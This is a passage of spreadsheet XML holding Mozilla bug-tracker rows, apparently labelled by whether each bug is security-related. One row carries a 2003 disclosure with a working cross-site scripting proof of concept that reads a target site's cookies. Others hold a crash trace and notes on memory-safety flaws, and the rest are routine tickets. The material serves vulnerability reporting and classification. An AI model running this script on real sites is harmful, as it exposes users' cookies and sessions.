      </c>
      <c r="M2754" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2754" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2754" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2754" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q2754" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2754" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2754" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2754" t="n">
        <v>1</v>
      </c>
      <c r="U2754" t="n">
        <v>0</v>
      </c>
      <c r="V2754" t="n">
        <v>17</v>
      </c>
      <c r="W2754" t="inlineStr">
        <is>
          <t>From sandblad@acc.umu.se (Andreas Sandblad), through security@mozilla.org:
PRIVATE SECURITY REPORT
-------------------------------------------------
Product: Mozilla browser
Tested:  Mozilla 1.5, Mozilla 1.2
Date:    2003-12-02
Issue:   Cross site scripting
Author:  Andreas Sandblad, sandblad@acc.umu.se
-------------------------------------------------
Summary:
========
When linking to a new page it is still possible to interact with the old
page before the new page has been successfully loaded. Any javascript
events fired will be invoked in the context of the new page, making cross
site scripting possible if the different pages belong to different
domains.
Details:
========
If you follow a link to another page there will always be some delay until
the new page is shown in the browser. The problem is that before the new page
has been displayed but after the browser has
set the new page as the current URL, it is still possible to interact with
the old page. Any javascript triggered will be operating in the domain of
the new page, regardless of the domain of the old page.
Mozilla has several security checks to prevent cross site scripting,
making actual exploitation a bit tricky. Before Mozilla switches to a new
URL it tries to remove any current running javascript, timers and event
handlers. The problem is that because the old page is still displayed
after the URL switch, it is possible to trigger certain tag events that
Mozilla failed to remove.
Exploit:
========
Our current document is filled with a lot of tables with height 1
containing onmousemove events. When mouse is initially moved over the
document we link to our target document and wait for Mozilla to switch to
the new URL. If mouse is moved after the switch our injected javascript
will be operating in the context of the new URL. Together with a very
limited amount of user interaction we can achieve a cross site scripting
attack.
Put the following code in a script tag and upload it to a remove server.
Make sure you got a cookie stored in the domain of the target. View the
html document containing the script in Mozilla and move the mouse over the
document to activate the exploit.
---------------- BEGIN ---------------------
// Andreas Sandblad
// 2003-11-24
// Mozilla - Cross site scripting
// Target URL (some network delay needed)
var target = "http://www.yahoo.com/";
// Write out a lot of onmousemove events
var block = true;
for (i = 0; i &lt; 1000; i++)
  document.write('&lt;table width=100% height=1 border=0&gt;&lt;tr&gt;'
    +'&lt;td onmousemove="try {block;} catch(e) {'+payload+';payload();}"&gt;'
    +'&lt;spacer type=block height=1&gt;&lt;/&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;');
document.close();
// Called first time mouse is moved over document
function trigger() {
  document.onmousemove = null;
  location = target;
}
document.onmousemove = trigger;
// If block not definied then call payload
function payload() {
  try {
    block;
  } catch(e) {
    document.body.innerHTML=document.cookie;
    alert(document.cookie);
  }
}
---------------- END -----------------------</t>
        </is>
      </c>
      <c r="X2754" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2755">
      <c r="A2755" t="n">
        <v>1052355</v>
      </c>
      <c r="B2755" t="inlineStr">
        <is>
          <t>2014-08-12 03:24:29 -0700</t>
        </is>
      </c>
      <c r="C2755" t="inlineStr">
        <is>
          <t>Remove the "supersearch-all" waffle switch</t>
        </is>
      </c>
      <c r="D2755" t="inlineStr">
        <is>
          <t>2014-11-10 23:48:05 -0800</t>
        </is>
      </c>
      <c r="E2755" t="n">
        <v>1</v>
      </c>
      <c r="F2755" t="n">
        <v>1</v>
      </c>
      <c r="G2755" t="n">
        <v>4</v>
      </c>
      <c r="H2755" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2755" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2755" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K2755" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2755" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2755" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2755" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2755" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2755" t="inlineStr"/>
      <c r="Q2755" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2755" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2755" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2755" t="n">
        <v>1</v>
      </c>
      <c r="U2755" t="n">
        <v>0</v>
      </c>
      <c r="V2755" t="n">
        <v>4</v>
      </c>
      <c r="W2755" t="inlineStr">
        <is>
          <t>Super Search is now a stable feature of Socorro, there is no point in having it behind a waffle switch anymore. 
However, this implies that Super Search will be exposed to new installs of Socorro by default. Hence, we should have the documentation of elasticsearch ready before we do this.</t>
        </is>
      </c>
      <c r="X2755" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2756">
      <c r="A2756" t="n">
        <v>1121638</v>
      </c>
      <c r="B2756" t="inlineStr">
        <is>
          <t>2015-01-14 11:54:33 -0800</t>
        </is>
      </c>
      <c r="C2756" t="inlineStr">
        <is>
          <t>Implement login for SUMO accounts</t>
        </is>
      </c>
      <c r="D2756" t="inlineStr">
        <is>
          <t>2015-03-11 10:09:16 -0700</t>
        </is>
      </c>
      <c r="E2756" t="n">
        <v>1</v>
      </c>
      <c r="F2756" t="n">
        <v>1</v>
      </c>
      <c r="G2756" t="n">
        <v>5</v>
      </c>
      <c r="H2756" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2756" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J2756" t="inlineStr">
        <is>
          <t>BuddyUp</t>
        </is>
      </c>
      <c r="K2756" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2756" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2756" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N2756" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2756" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2756" t="inlineStr">
        <is>
          <t>p=1 s=bu.2015.2</t>
        </is>
      </c>
      <c r="Q2756" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2756" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2756" t="inlineStr">
        <is>
          <t>2015Q1</t>
        </is>
      </c>
      <c r="T2756" t="n">
        <v>1</v>
      </c>
      <c r="U2756" t="n">
        <v>0</v>
      </c>
      <c r="V2756" t="n">
        <v>7</v>
      </c>
      <c r="W2756" t="inlineStr">
        <is>
          <t>We decided not to go with Firefox accounts and will instead be using SUMO accounts for BuddyUp. We will need to implement the login view for this.</t>
        </is>
      </c>
      <c r="X2756" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2757">
      <c r="A2757" t="n">
        <v>876155</v>
      </c>
      <c r="B2757" t="inlineStr">
        <is>
          <t>2013-05-25 09:58:58 -0700</t>
        </is>
      </c>
      <c r="C2757" t="inlineStr">
        <is>
          <t>Heap-use-after-free in mozilla::ResetDir</t>
        </is>
      </c>
      <c r="D2757" t="inlineStr">
        <is>
          <t>2016-12-01 13:31:04 -0800</t>
        </is>
      </c>
      <c r="E2757" t="n">
        <v>1</v>
      </c>
      <c r="F2757" t="n">
        <v>1</v>
      </c>
      <c r="G2757" t="n">
        <v>3</v>
      </c>
      <c r="H2757" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2757" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2757" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K2757" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2757" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2757" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2757" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2757" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2757" t="inlineStr">
        <is>
          <t>[asan][adv-main22+]</t>
        </is>
      </c>
      <c r="Q2757" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2757" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2757" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T2757" t="n">
        <v>1</v>
      </c>
      <c r="U2757" t="n">
        <v>0</v>
      </c>
      <c r="V2757" t="n">
        <v>37</v>
      </c>
      <c r="W2757" t="inlineStr">
        <is>
          <t>Created attachment 754144
Testcase
Need to install fuzzPriv extension to force gc and need to reload testcase 2-3 times to reproduce.
==14882== ERROR: AddressSanitizer: heap-use-after-free on address 0x60420d3f73ac at pc 0x7fa13585081c bp 0x7fff81577ef0 sp 0x7fff81577ee8
READ of size 4 at 0x60420d3f73ac thread T0
    #0 0x7fa13585081b in nsINode::GetBoolFlag(nsINode::BooleanFlag) const content/base/public/nsINode.h:1359
    #1 0x7fa1392dfbe3 in nsINode::HasTextNodeDirectionalityMap() const ../../../dist/include/nsINode.h:1442
    #2 0x7fa1392de7b9 in mozilla::nsTextNodeDirectionalityMap::RemoveElementFromMap(nsINode*, mozilla::dom::Element*) content/base/src/DirectionalityUtils.cpp:545
    #3 0x7fa1392e5bbf in mozilla::ResetDir(mozilla::dom::Element*) content/base/src/DirectionalityUtils.cpp:996
    #4 0x7fa1398cbf61 in mozilla::dom::Element::UnbindFromTree(bool, bool) content/base/src/Element.cpp:1316
    #5 0x7fa13a750d61 in nsGenericHTMLElement::UnbindFromTree(bool, bool) content/html/content/src/nsGenericHTMLElement.cpp:655
    #6 0x7fa1398cc238 in mozilla::dom::Element::UnbindFromTree(bool, bool) content/base/src/Element.cpp:1329
    #7 0x7fa13a750d61 in nsGenericHTMLElement::UnbindFromTree(bool, bool) content/html/content/src/nsGenericHTMLElement.cpp:655
    #8 0x7fa1398cc238 in mozilla::dom::Element::UnbindFromTree(bool, bool) content/base/src/Element.cpp:1329
    #9 0x7fa13a750d61 in nsGenericHTMLElement::UnbindFromTree(bool, bool) content/html/content/src/nsGenericHTMLElement.cpp:655
    #10 0x7fa13a8ee796 in mozilla::dom::HTMLBodyElement::UnbindFromTree(bool, bool) content/html/content/src/HTMLBodyElement.cpp:357
    #11 0x7fa1398cc238 in mozilla::dom::Element::UnbindFromTree(bool, bool) content/base/src/Element.cpp:1329
    #12 0x7fa13a750d61 in nsGenericHTMLElement::UnbindFromTree(bool, bool) content/html/content/src/nsGenericHTMLElement.cpp:655
    #13 0x7fa13b140125 in mozilla::dom::HTMLSharedElement::UnbindFromTree(bool, bool) content/html/content/src/HTMLSharedElement.cpp:305
    #14 0x7fa13966120f in nsDocument::cycleCollection::UnlinkImpl(void*) content/base/src/nsDocument.cpp:1823
    #15 0x7fa13b5945dc in nsHTMLDocument::cycleCollection::UnlinkImpl(void*) content/html/document/src/nsHTMLDocument.cpp:220
    #16 0x7fa1450dc1be in nsCycleCollector::CollectWhite(nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:2413
    #17 0x7fa1450cc583 in nsCycleCollector::FinishCollection(nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:2876
    #18 0x7fa1450cae49 in nsCycleCollectorRunner::Collect(ccType, nsCycleCollectorResults*, nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:1200
    #19 0x7fa1450e1c80 in nsCycleCollector::Collect(ccType, nsCycleCollectorResults*, nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:2772
    #20 0x7fa1450e7232 in nsCycleCollector_collect(bool, nsCycleCollectorResults*, nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:3088
    #21 0x7fa13c1aff82 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int, bool) dom/base/nsJSEnvironment.cpp:2563
    #22 0x7fa13c1ed344 in CCTimerFired(nsITimer*, void*) dom/base/nsJSEnvironment.cpp:2774
    #23 0x7fa145065062 in nsTimerImpl::Fire() xpcom/threads/nsTimerImpl.cpp:547
    #24 0x7fa1450664bd in nsTimerEvent::Run() xpcom/threads/nsTimerImpl.cpp:634
    #25 0x7fa14502bdc7 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:627
    #26 0x7fa144cc9132 in NS_ProcessNextEvent(nsIThread*, bool) objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:238
    #27 0x7fa14139ce24 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:117
    #28 0x7fa1453460eb in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:219
    #29 0x7fa145345f3e in MessageLoop::RunHandler() ipc/chromium/src/base/message_loop.cc:212
    #30 0x7fa145345e29 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:186
    #31 0x7fa140bf1f8e in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:163
    #32 0x7fa13f8be780 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:269
    #33 0x7fa13531a0cb in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:3872
    #34 0x7fa13531f790 in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3939
    #35 0x7fa135322455 in XRE_main toolkit/xre/nsAppRunner.cpp:4140
    #36 0x42a3f7 in do_main(int, char**, nsIFile*) browser/app/nsBrowserApp.cpp:272
    #37 0x427401 in main browser/app/nsBrowserApp.cpp:632
    #38 0x7fa15748776c in
    #39 0x426b74 in
0x60420d3f73ac is located 44 bytes inside of 120-byte region [0x60420d3f7380,0x60420d3f73f8)
freed by thread T0 here:
    #0 0x41a9e2 in __interceptor_free
    #1 0x7fa1554056de in moz_free memory/mozalloc/mozalloc.cpp:48
    #2 0x7fa139b8b419 in operator delete(void*) ../../../dist/include/mozilla/mozalloc.h:225
    #3 0x7fa139b8b419 in nsTextNode::~nsTextNode() content/base/src/nsTextNode.cpp:94
    #4 0x7fa139a514d5 in nsNodeUtils::LastRelease(nsINode*) content/base/src/nsNodeUtils.cpp:259
    #5 0x7fa13993fb6a in nsGenericDOMDataNode::Release() content/base/src/nsGenericDOMDataNode.cpp:116
    #6 0x7fa139b8c0b5 in nsTextNode::Release() content/base/src/nsTextNode.cpp:97
    #7 0x7fa13ebd6480 in _ZL17DoDeferredReleaseIP11nsISupportsEvR8nsTArrayIT_E js/xpconnect/src/XPCJSRuntime.cpp:616
    #8 0x7fa13ebd5951 in XPCJSRuntime::GCCallback(JSRuntime*, JSGCStatus) js/xpconnect/src/XPCJSRuntime.cpp:816
    #9 0x7fa14ca1161c in Collect(JSRuntime*, bool, long, js::JSGCInvocationKind, JS::gcreason::Reason) js/src/jsgc.cpp:4579
    #10 0x7fa14ca01f14 in js::GC(JSRuntime*, js::JSGCInvocationKind, JS::gcreason::Reason) js/src/jsgc.cpp:4596
    #11 0x7fa14c9761a9 in JS::GCForReason(JSRuntime*, JS::gcreason::Reason) js/src/jsfriendapi.cpp:181
    #12 0x7fa13eae7aae in nsXPCComponents_Utils::ForceGC() js/xpconnect/src/XPCComponents.cpp:4058
    #13 0x7fa14514eb5b in NS_InvokeByIndex xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #14 0x7fa13ed23d2f in CallMethodHelper::Invoke() js/xpconnect/src/XPCWrappedNative.cpp:2938
    #15 0x7fa13ed23d2f in CallMethodHelper::Call() js/xpconnect/src/XPCWrappedNative.cpp:2273
    #16 0x7fa13ed23d2f in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) js/xpconnect/src/XPCWrappedNative.cpp:2239
    #17 0x7fa13ed7d1b1 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1485
    #18 0x7fa14cc5c2df in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) js/src/jscntxtinlines.h:346
    #19 0x7fa14cc5c2df in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jsinterp.cpp:408
    #20 0x7fa14cc3641f in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode, bool) js/src/jsinterp.cpp:2265
    #21 0x7fa14cbe6843 in js::RunScript(JSContext*, js::StackFrame*) js/src/jsinterp.cpp:365
    #22 0x7fa14cc5c922 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jsinterp.cpp:421
    #23 0x7fa14cc607ab in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) js/src/jsinterp.cpp:454
    #24 0x7fa14cf944cd in js::DirectProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jsproxy.cpp:479
    #25 0x7fa14d5f4692 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jswrapper.cpp:445
    #26 0x7fa14cffd93e in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jsproxy.cpp:2611
    #27 0x7fa14d01ae3a in proxy_Call(JSContext*, unsigned int, JS::Value*) js/src/jsproxy.cpp:3175
    #28 0x7fa14cc5bbd2 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) js/src/jscntxtinlines.h:346
    #29 0x7fa14cc5bbd2 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/jsinterp.cpp:401
    #30 0x7fa14cc3641f in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode, bool) js/src/jsinterp.cpp:2265
    #31 0x7fa14cbe6843 in js::RunScript(JSContext*, js::StackFrame*) js/src/jsinterp.cpp:365
    #32 0x7fa14cc66319 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::AbstractFramePtr, JS::Value*) js/src/jsinterp.cpp:550
    #33 0x7fa14cc67f31 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) js/src/jsinterp.cpp:589
    #34 0x7fa14c590614 in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) js/src/jsapi.cpp:5645
previously allocated by thread T0 here:
    #0 0x41aac2 in malloc
    #1 0x7fa155405825 in moz_xmalloc memory/mozalloc/mozalloc.cpp:54
    #2 0x7fa13d54a640 in operator new(unsigned long) ../../dist/include/mozilla/mozalloc.h:201
    #3 0x7fa13d54a640 in nsHtml5TreeOperation::AppendText(unsigned short const*, unsigned int, nsIContent*, nsHtml5TreeOpExecutor*) parser/html/nsHtml5TreeOperation.cpp:167
    #4 0x7fa13d554b88 in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**) parser/html/nsHtml5TreeOperation.cpp:459
    #5 0x7fa13d5710f5 in nsHtml5TreeOpExecutor::RunFlushLoop() parser/html/nsHtml5TreeOpExecutor.cpp:557
    #6 0x7fa13d5ab702 in nsHtml5ExecutorFlusher::Run() parser/html/nsHtml5StreamParser.cpp:125
    #7 0x7fa14502bdc7 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:627
    #8 0x7fa144cc9132 in NS_ProcessNextEvent(nsIThread*, bool) objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:238
    #9 0x7fa14139c859 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:82
    #10 0x7fa1453460eb in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:219
    #11 0x7fa145345f3e in MessageLoop::RunHandler() ipc/chromium/src/base/message_loop.cc:212
    #12 0x7fa145345e29 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:186
    #13 0x7fa140bf1f8e in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:163
    #14 0x7fa13f8be780 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:269
    #15 0x7fa13531a0cb in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:3872
    #16 0x7fa13531f790 in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3939
    #17 0x7fa135322455 in XRE_main toolkit/xre/nsAppRunner.cpp:4140
    #18 0x42a3f7 in do_main(int, char**, nsIFile*) browser/app/nsBrowserApp.cpp:272
    #19 0x427401 in main browser/app/nsBrowserApp.cpp:632
    #20 0x7fa15748776c in
Shadow bytes around the buggy address:
  0x0c08c1a76e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c08c1a76e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c08c1a76e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c08c1a76e50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c08c1a76e60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c08c1a76e70: fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fa
  0x0c08c1a76e80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c08c1a76e90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c08c1a76ea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c08c1a76eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c08c1a76ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:     fa
  Heap righ redzone:     fb
  Freed Heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  ASan internal:         fe
==14882== ABORTING</t>
        </is>
      </c>
      <c r="X2757" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2758">
      <c r="A2758" t="n">
        <v>1079751</v>
      </c>
      <c r="B2758" t="inlineStr">
        <is>
          <t>2014-10-08 02:36:28 -0700</t>
        </is>
      </c>
      <c r="C2758" t="inlineStr">
        <is>
          <t>Serve loop-client at hello.firefox.com (DNS entry + SSL certificate request)</t>
        </is>
      </c>
      <c r="D2758" t="inlineStr">
        <is>
          <t>2014-10-27 17:21:00 -0700</t>
        </is>
      </c>
      <c r="E2758" t="n">
        <v>1</v>
      </c>
      <c r="F2758" t="n">
        <v>1</v>
      </c>
      <c r="G2758" t="n">
        <v>2</v>
      </c>
      <c r="H2758" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2758" t="inlineStr">
        <is>
          <t>Cloud Services</t>
        </is>
      </c>
      <c r="J2758" t="inlineStr">
        <is>
          <t>Operations: Deployment Requests - DEPRECATED</t>
        </is>
      </c>
      <c r="K2758" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2758" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2758" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2758" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2758" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2758" t="inlineStr">
        <is>
          <t>[qa+]</t>
        </is>
      </c>
      <c r="Q2758" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2758" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2758" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2758" t="n">
        <v>1</v>
      </c>
      <c r="U2758" t="n">
        <v>0</v>
      </c>
      <c r="V2758" t="n">
        <v>14</v>
      </c>
      <c r="W2758" t="inlineStr">
        <is>
          <t>We should add a new DNS entry in route53 to handle this.
Assigned to you dean, feel free to reassign if needed.</t>
        </is>
      </c>
      <c r="X2758" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2759">
      <c r="A2759" t="n">
        <v>661567</v>
      </c>
      <c r="B2759" t="inlineStr">
        <is>
          <t>2011-06-02 10:17:10 -0700</t>
        </is>
      </c>
      <c r="C2759" t="inlineStr">
        <is>
          <t>WeakMap uses a ContextAllocPolicy, should use a SystemAllocPolicy</t>
        </is>
      </c>
      <c r="D2759" t="inlineStr">
        <is>
          <t>2013-12-27 14:28:35 -0800</t>
        </is>
      </c>
      <c r="E2759" t="n">
        <v>1</v>
      </c>
      <c r="F2759" t="n">
        <v>1</v>
      </c>
      <c r="G2759" t="n">
        <v>3</v>
      </c>
      <c r="H2759" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2759" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2759" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2759" t="inlineStr">
        <is>
          <t>Other Branch</t>
        </is>
      </c>
      <c r="L2759" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2759" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2759" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2759" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2759" t="inlineStr">
        <is>
          <t>[sg:moderate], [landed m-c 6/20] fixed-in-tracemonkey [qa-]</t>
        </is>
      </c>
      <c r="Q2759" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2759" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2759" t="inlineStr">
        <is>
          <t>mozilla7</t>
        </is>
      </c>
      <c r="T2759" t="n">
        <v>1</v>
      </c>
      <c r="U2759" t="n">
        <v>0</v>
      </c>
      <c r="V2759" t="n">
        <v>38</v>
      </c>
      <c r="W2759" t="inlineStr">
        <is>
          <t>Each WeakMap object keeps a pointer to the JSContext in which it was created. It's used to report OOM errors.
Possible consequences:
  * This could cause an OOM error to be reported in the wrong context, which
    is not so bad.
  * This could cause us to try to report OOM in a context that has been
    destroyed, which might be exploitable (we call through a function
    pointer cx-&gt;errorReporter).</t>
        </is>
      </c>
      <c r="X2759" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2760">
      <c r="A2760" t="n">
        <v>867597</v>
      </c>
      <c r="B2760" t="inlineStr">
        <is>
          <t>2013-05-01 08:20:41 -0700</t>
        </is>
      </c>
      <c r="C2760" t="inlineStr">
        <is>
          <t>IonMonkey: ARM hwcaps detection depends on uninitialised garbage on the stack</t>
        </is>
      </c>
      <c r="D2760" t="inlineStr">
        <is>
          <t>2015-02-25 20:46:40 -0800</t>
        </is>
      </c>
      <c r="E2760" t="n">
        <v>1</v>
      </c>
      <c r="F2760" t="n">
        <v>1</v>
      </c>
      <c r="G2760" t="n">
        <v>3</v>
      </c>
      <c r="H2760" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2760" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2760" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K2760" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2760" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2760" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2760" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2760" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2760" t="inlineStr">
        <is>
          <t>[adv-main27+]</t>
        </is>
      </c>
      <c r="Q2760" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2760" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2760" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T2760" t="n">
        <v>1</v>
      </c>
      <c r="U2760" t="n">
        <v>0</v>
      </c>
      <c r="V2760" t="n">
        <v>27</v>
      </c>
      <c r="W2760" t="inlineStr">
        <is>
          <t>js/src/ion/arm/Architecture-arm.cpp:64 ibid has this
#elif defined(WTF_OS_ANDROID) || defined(MOZ_B2G)
    FILE *fp = fopen("/proc/cpuinfo", "r");
    if (!fp)
        return false;
    char buf[1024];
    fread(buf, sizeof(char), sizeof(buf), fp);
    fclose(fp);
    if (strstr(buf, "vfp"))
        flags |= HWCAP_VFP;
    if (strstr(buf, "vfpv3"))
        flags |= HWCAP_VFPv3;
